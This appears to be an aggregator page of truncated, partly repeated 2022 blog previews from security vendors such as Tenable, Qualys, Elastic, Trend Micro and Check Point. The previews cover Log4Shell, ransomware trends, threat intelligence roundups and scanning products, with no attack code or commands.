2022 Threat Landscape Report
blogs_tenable·2022-12-27
2022 Threat Landscape Report
by Josef Weiss December 27, 2022
2022 began with concerns over supply chains and Software Bills of Material (SBOM) as organizations worldwide were forced to reconsider how they respond to incidents in anticipation of the next major event. Tenable’s Security Response Team (SRT) continuously monitors the threat landscape throughout the year, always at the forefront of trending vulnerabilities and security threats. This dashboard provides a summary of Tenable data that has been compiled over the past year.
In a year marked by hacktivism, ransomware and attacks targeting critical infrastructure set against a turbulent macroeconomic environment, organizations struggled to keep pace with the demands on cybersecurity teams and resources. Attacks against critical infrastructure remained a common
Tenable
2022 Threat Landscape Report
blogs_tenable·2022-12-21
2022 Threat Landscape Report
by Josef Weiss December 21, 2022
2022 began with concerns over supply chains and Software Bills of Material (SBOM) as organizations worldwide were forced to reconsider how they respond to incidents in anticipation of the next major event. Tenable’s Security Response Team (SRT) continuously monitors the threat landscape throughout the year, always at the forefront of trending vulnerabilities and security threats. This dashboard provides a summary of Tenable data that has been compiled over the past year.
In a year marked by hacktivism, ransomware and attacks targeting critical infrastructure in a turbulent macroeconomic environment, organizations struggled to keep pace with the demands on cybersecurity teams and resources. Attacks against critical infrastructure remained a common concern.
Tenable
Cybersecurity Snapshot: Phishing Scams, Salary Trends, Metaverse Risks, Log4J Poll
blogs_tenable·2022-12-16
Cybersecurity Snapshot: Phishing Scams, Salary Trends, Metaverse Risks, Log4J Poll
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Qualys
Identify Server-Side Attacks Using Qualys Periscope | Qualys
blogs_qualys·2022-12-01·CVSS 8.8
[HIGH] Identify Server-Side Attacks Using Qualys Periscope | Qualys
#### Table of Contents
- Potential False Positives
- Potential False Negatives
Qualys previously announced the introduction of Qualys Periscope in 2020. This technology allows Qualys Web Application Scanning (WAS) to detect out-of-band vulnerabilities such as server-side request forgery (SSRF). Qualys Periscope provides confirmed detections for additional vulnerabilities, such as Log4j, where it enables rapid development and release of the QID. Occasionally, Qualys receives questions and support cases related to Qualys Periscope. This article will provide more detail on the common questions/situations seen with out-of-band detections.
As of publishing, the vulnerability detections that utilize Qualys Periscope are:
- QID 150055 – OS Command Injection
- QID 150179 – Blind XXE injection
Qualys
Identify Server-Side Attacks Using Qualys Periscope
blogs_qualys·2022-12-01·CVSS 8.8
[HIGH] Identify Server-Side Attacks Using Qualys Periscope
## Table of Contents
Potential False Positives
Potential False Negatives
Qualys previously announced the introduction of Qualys Periscope in 2020. This technology allows Qualys Web Application Scanning (WAS) to detect out-of-band vulnerabilities such as server-side request forgery (SSRF). Qualys Periscope provides confirmed detections for additional vulnerabilities, such as Log4j, where it enables rapid development and release of the QID. Occasionally, Qualys receives questions and support cases related to Qualys Periscope . This article will provide more detail on the common questions/situations seen with out-of-band detections.
As of publishing, the vulnerability detections that utilize Qualys Periscope are:
QID 150055 – OS Command Injection
QID 150179 – Blind XXE injection
QID 15
Elastic
Analysis of Log4Shell vulnerability & CVE-2021-45046 — Elastic Security Labs
blogs_elastic·2022-11-30·CVSS 10.0
CVE-2021-45046 [CRITICAL] Analysis of Log4Shell vulnerability & CVE-2021-45046 — Elastic Security Labs
30 November 2022•Jake King
# Analysis of Log4Shell vulnerability & CVE-2021-45046
In this post, we cover next steps the Elastic Security team is taking for users to continue to protect themselves against CVE-2021-44228, or Log4Shell.
4 min readDetection Engineering, Product Updates
> To understand how Elastic is currently assessing internal risk of this vulnerability in our products please see the advisoryhere.
>
>
>
>
> This document was updated on December 17, 2021 to reflect a revised CVSS score for CVE-2021-45046, and new findings by the community.
In recent days Log4Shell, or CVE-2021-44228, has dominated the news cycle in the world of information security and beyond. Elastic released an advisory detailing how Elastic products and users are impacted, and a blog post describing ho
Elastic
Analysis of Log4Shell vulnerability & CVE-2021-45046 — Elastic Security Labs
blogs_elastic·2022-11-30·CVSS 10.0
CVE-2021-45046 [CRITICAL] Analysis of Log4Shell vulnerability & CVE-2021-45046 — Elastic Security Labs
## Analysis of Log4Shell vulnerability & CVE-2021-45046
In this post, we cover next steps the Elastic Security team is taking for users to continue to protect themselves against CVE-2021-44228, or Log4Shell.
To understand how Elastic is currently assessing internal risk of this vulnerability in our products please see the advisory here.
This document was updated on December 17, 2021 to reflect a revised CVSS score for CVE-2021-45046, and new findings by the community.
In recent days Log4Shell, or CVE-2021-44228, has dominated the news cycle in the world of information security and beyond. Elastic released an advisory detailing how Elastic products and users are impacted, and a blog post describing how our users can leverage Elastic Security to help defend their networks.
Many readers
Trendmicro
How the MITRE ATT&CK Framework Enhances Cloud Security
blogs_trendmicro·2022-11-24
How the MITRE ATT&CK Framework Enhances Cloud Security
Cloud
# How the MITRE ATT&CK Framework Enhances Cloud Security
Upgrade your cybersecurity game with MITRE ATT&CK™. Discover how this framework can help you protect your business—now and in the future.
By: Michael Langford
2022/11/24
Read time: ( words)
Save to Folio
What is the MITRE ATT&CK™?
MITRE ATT&CK is a framework consisting of several tactics to help businesses regain control of their security systems. ATT&CK—short for adversarial tactics, techniques, and common knowledge—is a knowledge base consisting of the different strategies and specific techniques that cyber adversaries use to exploit your systems based on real-world cyberattacks. The MITRE ATT&CK provides a deeper scope of knowledge than the Cyber Kill Chain by including granular details about cyberattacks.
MITRE laun
Elastic
Detecting Exploitation of CVE-2021-44228 (Log4j2) with Elastic Security — Elastic Security Labs
blogs_elastic·2022-11-22·CVSS 10.0
CVE-2021-44228 [CRITICAL] Detecting Exploitation of CVE-2021-44228 (Log4j2) with Elastic Security — Elastic Security Labs
22 November 2022•Jake King•Samir Bousseaden
# Detecting Exploitation of CVE-2021-44228 (Log4j2) with Elastic Security
This blog post provides a summary of CVE-2021-44228 and provides Elastic Security users with detections to find active exploitation of the vulnerability in their environment. Further updates will be provided to this post as we learn more.
5 min readDetection Engineering, Product Updates
> - To understand how Elastic is currently assessing internal risk of this vulnerability in our products please see the advisoryhere.
> - This blog has been updated (Dec. 17, 2021) with further detection and hunting improvements since its initial publish.
## Overview
This blog post provides a summary of CVE-2021-44228 and provides Elastic Security users with detections to find active e
Elastic
Detecting Exploitation of CVE-2021-44228 (Log4j2) with Elastic Security — Elastic Security Labs
blogs_elastic·2022-11-22·CVSS 10.0
CVE-2021-44228 [CRITICAL] Detecting Exploitation of CVE-2021-44228 (Log4j2) with Elastic Security — Elastic Security Labs
## Detecting Exploitation of CVE-2021-44228 (Log4j2) with Elastic Security
This blog post provides a summary of CVE-2021-44228 and provides Elastic Security users with detections to find active exploitation of the vulnerability in their environment. Further updates will be provided to this post as we learn more.
To understand how Elastic is currently assessing internal risk of this vulnerability in our products please see the advisory here.
This blog has been updated (Dec. 17, 2021) with further detection and hunting improvements since its initial publish.
## Overview
This blog post provides a summary of CVE-2021-44228 and provides Elastic Security users with detections to find active exploitation of the vulnerability in their environment.
Further updates will be provided to this pos
Checkpoint
21st November– Threat Intelligence Report
blogs_checkpoint·2022-11-21·CVSS 10.0
CVE-2021-44228 [CRITICAL] 21st November– Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 21st November– Threat Intelligence Report
For the latest discoveries in cyber research for the week of 21st November, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
US CISA has discovered nation-state threat activity affecting an American federal government entity. The attackers, who CISA estimates to be Iran-sponsored, exploited the 2021 ‘Log4Shell’ vulnerability in an unpatched server to gain initial access. Afterwards, the attackers deployed a cryptocurrency miner, harvested cred
Securelist
IT threat evolution in Q3 2022. Non-mobile statistics
blogs_securelist·2022-11-18
IT threat evolution in Q3 2022. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Number of users attacked by banking malware
TOP 10 banking malware families
Geography of financial malware attacks
Ransomware programs
Quarterly trends and highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
TOP 20 threats for macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
Countries and territories that serve as sources of web-ba
Securelist
PC malware statistics, Q3 2022
blogs_securelist·2022-11-18
PC malware statistics, Q3 2022
Table of Contents
- Quarterly figures
- Financial threats
- Ransomware programs
- Miners
- Vulnerable applications used by criminals during cyberattacks
- Attacks on macOS
- IoT attacks
- Attacks via web resources
- Local threats
Authors
- AMR
- IT threat evolution in Q3 2022
- IT threat evolution in Q3 2022. Non-mobile statistics
- IT threat evolution in Q3 2022. Mobile statistics
These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data.
## Quarterly figures
According to Kaspersky Security Network, in Q3 2022:
- Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe.
- Web Anti-Virus recognized 251,288,987 unique URLs as malicious.
- Attempts to run malware fo
Trendmicro
Management der Angriffsflächen: Ransomware und Cloud
blogs_trendmicro·2022-11-08·CVSS 10.0
[CRITICAL] Management der Angriffsflächen: Ransomware und Cloud
Cyberbedrohungen
## Management der Angriffsflächen: Ransomware und Cloud
Die Cybersicherheitslandschaft hat sich in der ersten Hälfte des Jahres 2022 erheblich verändert. Bei den Angriffen stehen vor allem solche mit Ransomware und auf Cloud-Umgebungen im Mittelpunkt, aber auch tückische Schwachstellen werden genutzt.
By: Trend Micro Nov 08, 2022 Read time: ( words)
Save to Folio
Wir haben bereits aufgezeigt, dass die Angriffsflächen immer größer wurden und die Akteure in ihren Attacken immer raffinierter vorgehen. Besonders Ransomware und Cloud-Umgebungen stehen im Mittelpunkt. Aber auch anderere bemerkenswerte Schwachstellen ein, die in der ersten Jahreshälfte für großen Schaden gesorgt haben.
Die Zahl der von CVE veröffentlichten Schwachstellen ist in der ersten Jahreshälfte 2022
Tenable
log4shell Critical Vulnerability
blogs_tenable·2022-11-02·CVSS 10.0
CVE-2021-44228 [CRITICAL] log4shell Critical Vulnerability
by Cesar Navas November 2, 2022
On December 9, 2021, researchers published proof-of-concept (PoC) exploit code for a critical vulnerability in Apache Log4j, a Java logging library used by a number of applications and services. This vulnerability, identified as CVE-2021-44228, is a Remote Code Execution (RCE) vulnerability in Apache Log4j. This dashboard is designed to help organizations determine what assets may contain vulnerabilities susceptible to the Apache Log4j exploit.
The Log4j vulnerability impacts a number of services and applications used widely across the internet, and is actively being exploited with multiple proofs of concept on GitHub.
According to the published CVE, all Apache Log4j versions 2.14.1 or less are vulnerable. An unauthenticated remote attacker could exploit
Tenable
Defending Against Ransomware (ACT)
blogs_tenable·2022-11-01
Defending Against Ransomware (ACT)
by Josef Weiss November 1, 2022
Ransomware attacks leverage well-known and established software vulnerabilities and poor cyber hygiene. Successful ransomware attacks can cripple an organization with increased costs and lost revenue. This dashboard highlights a path forward with an in-depth focus on cyber hygiene by enabling IT staff to focus on vulnerabilities that could have the most impact to the organization in the event of a ransomware attack.
There are many contributing factors to the upward trend of ransomware. The most important is the large number of software vulnerabilities and misconfigurations, along with Active Directory (AD) weaknesses that enable attackers to escalate privileges. Threat actors leverage poor cyber hygiene to their advantage to gain a foothold and propagate a
Qualys
Why Is Snapshot Scanning Not Enough? | Qualys
blogs_qualys·2022-11-01
Why Is Snapshot Scanning Not Enough? | Qualys
#### Table of Contents
- What Is Snapshot Scanning?
- Places Where Snapshot Scanning Makes Sense
- Limitations of Snapshot Scanning
- When Agents Should Be Used
- When API-Based Scanning Should Be Used
- When network scanning should be used
- What Users Want Multiple Scanner Options
- What Is Qualys FlexScan?
- The Advantage of FlexScan
- Recommendations on When To Use Each Scanning Method With FlexScan
- Additional Resources
As new scanning technologies are released, their supposed superiority is touted over the others. The problem is, however, that there is no best scanning technology, all of them have strengths and limitations. If recent claims from several vendors are believed, a “best” scanning method called snapshot scanning exists. But when we look closely, snapshot scanning has a
Qualys
Why Is Snapshot Scanning Not Enough?
blogs_qualys·2022-11-01
Why Is Snapshot Scanning Not Enough?
## Table of Contents
What Is Snapshot Scanning?
Places Where Snapshot Scanning Makes Sense
Limitations of Snapshot Scanning
When Agents Should Be Used
When API-Based Scanning Should Be Used
When network scanning should be used
What Users Want Multiple Scanner Options
What Is Qualys FlexScan?
The Advantage of FlexScan
Recommendations on When To Use Each Scanning Method With FlexScan
Additional Resources
As new scanning technologies are released, their supposed superiority is touted over the others. The problem is, however, that there is no best scanning technology, all of them have strengths and limitations. If recent claims from several vendors are believed, a “best” scanning method called snapshot scanning exists. But when we look closely, snapshot scanning has advantages for
Tenable
Executive Summary
blogs_tenable·2022-10-31·CVSS 10.0
[CRITICAL] Executive Summary
by Josef Weiss October 31, 2022
Monitoring the current state of an organization's Cyber Exposure initiative and measuring the organization's cyber risk are key responsibilities of security analysts. Security analysts can leverage Common Vulnerabilities and Exposures (CVE) metrics, vulnerability state and other high-level metrics, to provide security management information that identifies which steps in the life cycle need attention or are missing altogether. This dashboard consolidates several of these key metrics to identify and measure cyber risk.
There are metrics for five severity levels: Information, Low, Medium, High and Critical. Information has no risk associated with the finding, and only provides information for an analyst. Low through Critical severities are based on the Commo
Trendmicro
Attack Surface Management 2022 Midyear Review Part 2
blogs_trendmicro·2022-10-27·CVSS 10.0
[CRITICAL] Attack Surface Management 2022 Midyear Review Part 2
Rischi di Privacy
## Attack Surface Management 2022 Midyear Review Part 2
In our 2022 midyear roundup, we examine the most significant trends and incidents that influenced the cybersecurity landscape in the first half of the year.
By: Trend Micro Oct 27, 2022 Read time: ( words)
Save to Folio
The cybersecurity landscape changed significantly in the first half of 2022. In our midyear roundup , we examine these changes and their effects on business operations as well as what you need to know about staying protected from online attacks.
In part one of the series , we talked about the growing attack surface and how actors have become more sophisticated. In this second instalment, we put ransomware and cloud environments into the spotlight. We also discuss other notable vulnerabilities th
Trendmicro
Attack Surface Management 2022 Midyear Review Part 2
blogs_trendmicro·2022-10-27·CVSS 10.0
[CRITICAL] Attack Surface Management 2022 Midyear Review Part 2
Privacy & Risks
## Attack Surface Management 2022 Midyear Review Part 2
In our 2022 midyear roundup, we examine the most significant trends and incidents that influenced the cybersecurity landscape in the first half of the year.
By: Trend Micro Oct 27, 2022 Read time: ( words)
Save to Folio
The cybersecurity landscape changed significantly in the first half of 2022. In our midyear roundup , we examine these changes and their effects on business operations as well as what you need to know about staying protected from online attacks.
In part one of the series , we talked about the growing attack surface and how actors have become more sophisticated. In this second instalment, we put ransomware and cloud environments into the spotlight. We also discuss other notable vulnerabilities that
Trendmicro
Attack Surface Management 2022 Midyear Review Part 2
blogs_trendmicro·2022-10-27·CVSS 10.0
[CRITICAL] Attack Surface Management 2022 Midyear Review Part 2
Privacy & Risks
## Attack Surface Management 2022 Midyear Review Part 2
In our 2022 midyear roundup, we examine the most significant trends and incidents that influenced the cybersecurity landscape in the first half of the year.
By: Trend Micro 2022/10/27 Read time: ( words)
Save to Folio
The cybersecurity landscape changed significantly in the first half of 2022. In our midyear roundup , we examine these changes and their effects on business operations as well as what you need to know about staying protected from online attacks.
In part one of the series , we talked about the growing attack surface and how actors have become more sophisticated. In this second instalment, we put ransomware and cloud environments into the spotlight. We also discuss other notable vulnerabilities that h
Trendmicro
Attack Surface Management 2022 Midyear Review Part 2
blogs_trendmicro·2022-10-27·CVSS 10.0
[CRITICAL] Attack Surface Management 2022 Midyear Review Part 2
Privacidad y riesgos
## Attack Surface Management 2022 Midyear Review Part 2
In our 2022 midyear roundup, we examine the most significant trends and incidents that influenced the cybersecurity landscape in the first half of the year.
By: Trend Micro Oct 27, 2022 Read time: ( words)
Save to Folio
The cybersecurity landscape changed significantly in the first half of 2022. In our midyear roundup , we examine these changes and their effects on business operations as well as what you need to know about staying protected from online attacks.
In part one of the series , we talked about the growing attack surface and how actors have become more sophisticated. In this second instalment, we put ransomware and cloud environments into the spotlight. We also discuss other notable vulnerabilities
Trendmicro
Attack Surface Management 2022 Midyear Review Part 2
blogs_trendmicro·2022-10-27
Attack Surface Management 2022 Midyear Review Part 2
Privacy & Risks
# Attack Surface Management 2022 Midyear Review Part 2
In our 2022 midyear roundup, we examine the most significant trends and incidents that influenced the cybersecurity landscape in the first half of the year.
By: Trend Micro
2022/10/27
Read time: ( words)
Save to Folio
The cybersecurity landscape changed significantly in the first half of 2022. In our midyear roundup, we examine these changes and their effects on business operations as well as what you need to know about staying protected from online attacks.
In part one of the series, we talked about the growing attack surface and how actors have become more sophisticated. In this second instalment, we put ransomware and cloud environments into the spotlight. We also discuss other notable vulnerabilities that hav
Talos
Quarterly Report: Incident Response Trends in Q3 2022
blogs_talos·2022-10-25
Quarterly Report: Incident Response Trends in Q3 2022
### Ransomware and pre-ransomware engagements make up 40 percent of threats seen this quarter
For the first time since compiling these reports, Cisco Talos Incident Response saw an equal number of ransomware and pre-ransomware engagements, making up nearly 40 percent of threats this quarter.
It can be difficult to determine what constitutes a pre-ransomware attack if ransomware never executes and encryption does not take place. However, Talos IR assesses that the combination of Cobalt Strike and credential-harvesting tools like Mimikatz, paired with enumeration and discovery techniques, indicates a high likelihood that ransomware is the final objective.
This quarter featured a variety of publicly available tools and scripts hosted on GitHub repositories or other third-party websites to
Talos
Quarterly Report: Incident Response Trends in Q3 2022
blogs_talos·2022-10-25
Quarterly Report: Incident Response Trends in Q3 2022
## Quarterly Report: Incident Response Trends in Q3 2022
## Ransomware and pre-ransomware engagements make up 40 percent of threats seen this quarter
For the first time since compiling these reports, Cisco Talos Incident Response saw an equal number of ransomware and pre-ransomware engagements, making up nearly 40 percent of threats this quarter.
It can be difficult to determine what constitutes a pre-ransomware attack if ransomware never executes and encryption does not take place. However, Talos IR assesses that the combination of Cobalt Strike and credential-harvesting tools like Mimikatz, paired with enumeration and discovery techniques, indicates a high likelihood that ransomware is the final objective.
This quarter featured a variety of publicly available tools and scripts hosted
Checkpoint
24th October – Threat Intelligence Report
blogs_checkpoint·2022-10-24
CVE-2022-22954 24th October – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 24th October – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 24th October, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Iranian Hacktivist group ‘Black Reward’ claim to have breached Iran’s government and exfiltrated data related to the country’s nuclear program. After the group’s demands to release political prisoners were not met, the group eventually released 50GB of allegedly sensitive data. Iran’s nuclear agency confirmed the breach,
Qualys
NSA Alert: Topmost CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors
blogs_qualys·2022-10-07·CVSS 10.0
[CRITICAL] NSA Alert: Topmost CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors
## Table of Contents
Detect & Prioritize 20 Publicly Known Vulnerabilities using VMDR 2.0
Identify Vulnerable Assets using Qualys Threat Protection
Recommendations & Mitigations
Contributors
On October 6, 2022, the United States National Security Agency (NSA) released a cybersecurity advisory on the Chinese government—officially known as the People’s Republic of China (PRC) states-sponsored cyber actors’ activity to seek national interests. These malicious cyber activities attributed to the Chinese government targeted, and persist to target, a mixture of industries and organizations in the United States. They provide the top CVEs used since 2020 by the People’s Republic of China (PRC) states-sponsored cyber actors as evaluated by the National Security Agency (NSA), Cybersecurity and I
Qualys
NSA Alert: Topmost CVEs Actively Exploited By PRC Sponsored Cyber Actors | Qualys
blogs_qualys·2022-10-07
NSA Alert: Topmost CVEs Actively Exploited By PRC Sponsored Cyber Actors | Qualys
#### Table of Contents
- Detect & Prioritize 20 Publicly Known Vulnerabilities using VMDR 2.0
- Identify Vulnerable Assets using Qualys Threat Protection
- Recommendations & Mitigations
- Contributors
On October 6, 2022, the United States National Security Agency (NSA) released a cybersecurity advisory on the Chinese government—officially known as the People’s Republic of China (PRC) states-sponsored cyber actors’ activity to seek national interests. These malicious cyber activities attributed to the Chinese government targeted, and persist to target, a mixture of industries and organizations in the United States. They provide the top CVEs used since 2020 by the People’s Republic of China (PRC) states-sponsored cyber actors as evaluated by the National Security Agency (NSA), Cybersecurit
Tenable
Top 20 CVEs Exploited by People's Republic of China State-Sponsored Actors (AA22-279A)
blogs_tenable·2022-10-07
Top 20 CVEs Exploited by People's Republic of China State-Sponsored Actors (AA22-279A)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Checkpoint
19th September – Threat Intelligence Report
blogs_checkpoint·2022-09-19
CVE-2022-29499 19th September – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 19th September – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 19th September, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Uber has suffered a data breach, allegedly by an 18-year-old hacker who managed to gain access using social engineering tactics on an employee. The hacker claims to have access to Uber’s internal IT systems and to the company’s HackerOne bug bounty account, which contains vulnerabilities in Uber’s systems and apps, di
Tenable
AA22-257A: Cybersecurity Agencies Issue Joint Advisory on Iranian Islamic Revolutionary Guard Corps-Affiliated Attacks
blogs_tenable·2022-09-15
AA22-257A: Cybersecurity Agencies Issue Joint Advisory on Iranian Islamic Revolutionary Guard Corps-Affiliated Attacks
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Checkpoint
12th September – Threat Intelligence Report
blogs_checkpoint·2022-09-12·CVSS 10.0
CVE-2021-44228 [CRITICAL] 12th September – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 12th September – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 12th September, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Check Point Research uncovered a malicious campaign dubbed “DangerousSavanna” targeting multiple major financial groups in French-speaking Africa for the past two years. Threat actors used spear-phishing as the initial infection method, sending malicious attachments by emails to financial services employees in Ivory C
Trendmicro
How Malicious Actors Abuse Native Linux Tools in Their Attacks
blogs_trendmicro·2022-09-08
How Malicious Actors Abuse Native Linux Tools in Their Attacks
Cloud
# How Malicious Actors Abuse Native Linux Tools in Attacks
Through our honeypots and telemetry, we were able to observe instances in which malicious actors abused native Linux tools to launch attacks on Linux environments. In this blog entry, we discuss how these utilities were used and provide recommendations on how to minimize their impact.
By: Nitesh Surana, David Fiser, Alfredo Oliveira
2022/09/08
Read time: ( words)
Save to Folio
# Introduction
Container adoption has become mainstream, with usage having risen across organizations globally. Based on a survey from CNCF, 93% of respondents are currently using or planning to use containers in their production. Container orchestration projects like Kubernetes and other tools available in the cloud and across the internet has l
Trendmicro
How Malicious Actors Abuse Native Linux Tools in Their Attacks
blogs_trendmicro·2022-09-08
How Malicious Actors Abuse Native Linux Tools in Their Attacks
Cloud
# How Malicious Actors Abuse Native Linux Tools in Attacks
Through our honeypots and telemetry, we were able to observe instances in which malicious actors abused native Linux tools to launch attacks on Linux environments. In this blog entry, we discuss how these utilities were used and provide recommendations on how to minimize their impact.
By: Nitesh Surana, David Fiser, Alfredo Oliveira
Sep 08, 2022
Read time: ( words)
Save to Folio
# Introduction
Container adoption has become mainstream, with usage having risen across organizations globally. Based on a survey from CNCF, 93% of respondents are currently using or planning to use containers in their production. Container orchestration projects like Kubernetes and other tools available in the cloud and across the internet has
Trendmicro
How Malicious Actors Abuse Native Linux Tools in Their Attacks
blogs_trendmicro·2022-09-08
How Malicious Actors Abuse Native Linux Tools in Their Attacks
Cloud
## How Malicious Actors Abuse Native Linux Tools in Attacks
Through our honeypots and telemetry, we were able to observe instances in which malicious actors abused native Linux tools to launch attacks on Linux environments. In this blog entry, we discuss how these utilities were used and provide recommendations on how to minimize their impact.
By: Nitesh Surana, David Fiser, Alfredo Oliveira 2022/09/08 Read time: ( words)
Save to Folio
Based on real-world attacks and our honeypots, we observed that malicious actors use a variety of enabled tools that come bundled with Linux distributions, such as curl, wget, chmod, chattr, ssh, base64, chroot, crontab, ps, and pkill, that are abused by attackers for nefarious purposes.
We have seen malicious actors abusing these tools in the wi
Trendmicro
How Malicious Actors Abuse Native Linux Tools in Their Attacks
blogs_trendmicro·2022-09-08
How Malicious Actors Abuse Native Linux Tools in Their Attacks
Nube
## How Malicious Actors Abuse Native Linux Tools in Attacks
Through our honeypots and telemetry, we were able to observe instances in which malicious actors abused native Linux tools to launch attacks on Linux environments. In this blog entry, we discuss how these utilities were used and provide recommendations on how to minimize their impact.
By: Nitesh Surana, David Fiser, Alfredo Oliveira Sep 08, 2022 Read time: ( words)
Save to Folio
Based on real-world attacks and our honeypots, we observed that malicious actors use a variety of enabled tools that come bundled with Linux distributions, such as curl, wget, chmod, chattr, ssh, base64, chroot, crontab, ps, and pkill, that are abused by attackers for nefarious purposes.
We have seen malicious actors abusing these tools in the w
Trendmicro
How Malicious Actors Abuse Native Linux Tools in Their Attacks
blogs_trendmicro·2022-09-08
How Malicious Actors Abuse Native Linux Tools in Their Attacks
Cloud
## How Malicious Actors Abuse Native Linux Tools in Attacks
Through our honeypots and telemetry, we were able to observe instances in which malicious actors abused native Linux tools to launch attacks on Linux environments. In this blog entry, we discuss how these utilities were used and provide recommendations on how to minimize their impact.
By: Nitesh Surana, David Fiser, Alfredo Oliveira Sep 08, 2022 Read time: ( words)
Save to Folio
Based on real-world attacks and our honeypots, we observed that malicious actors use a variety of enabled tools that come bundled with Linux distributions, such as curl, wget, chmod, chattr, ssh, base64, chroot, crontab, ps, and pkill, that are abused by attackers for nefarious purposes.
We have seen malicious actors abusing these tools in the
Checkpoint
29th August – Threat Intelligence Report
blogs_checkpoint·2022-08-29
CVE-2021-44228 29th August – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 29th August – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 29th August, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Montenegro has suffered a large-scale cyber attack, affecting multiple government services . According to some sources, it potentially affected critical infrastructure , transportation and telecommunications . Montenegro’s security agency has claimed that the attack was coordinated and persistent, and has concluded with cer
Qualys
Mitigating the Risk of Zero-Day Vulnerabilities by using Compensating Controls
blogs_qualys·2022-08-23
Mitigating the Risk of Zero-Day Vulnerabilities by using Compensating Controls
## Table of Contents
Why Are Zero-Day Attacks/Exploits so Dangerous?
How Qualys Policy Compliance Helps Combat Zero-Day Threats
Benefit of Qualys Policy Compliance for Zero-Day Threats
Summary
Getting Started
Contributors
Zero-day vulnerability attacks have emerged as a major cybersecurity threat in the last few years. Organizations most often targeted include large enterprises and government/Federal agencies. However, any organization, regardless of its size, business, or industry, is a potential target for zero-day threats.
Most notably, already publicly disclosed. This means that one out of every four zero-day exploits detected could potentially have been avoided if a more thorough investigation and patching effort had been pursued. In 2021, around 58 zero-day vulnerabilities we
Securelist
IT threat evolution in Q2 2022. Non-mobile statistics
blogs_securelist·2022-08-15
IT threat evolution in Q2 2022. Non-mobile statistics
Table of Contents
Quarterly figures
Financial threats
Financial threat statistics
Ransomware programs
Quarterly trends and highlights
Number of new modifications
Number of users attacked by ransomware Trojans
Geography of attacked users
TOP 10 most common families of ransomware Trojans
Miners
Number of new miner modifications
Number of users attacked by miners
Geography of miner attacks
Vulnerable applications used by criminals during cyberattacks
Quarterly highlights
Vulnerability statistics
Attacks on macOS
Geography of threats for macOS
IoT attacks
IoT threat statistics
Attacks via web resources
TOP 10 countries and territories that serve as sources of web-based attacks
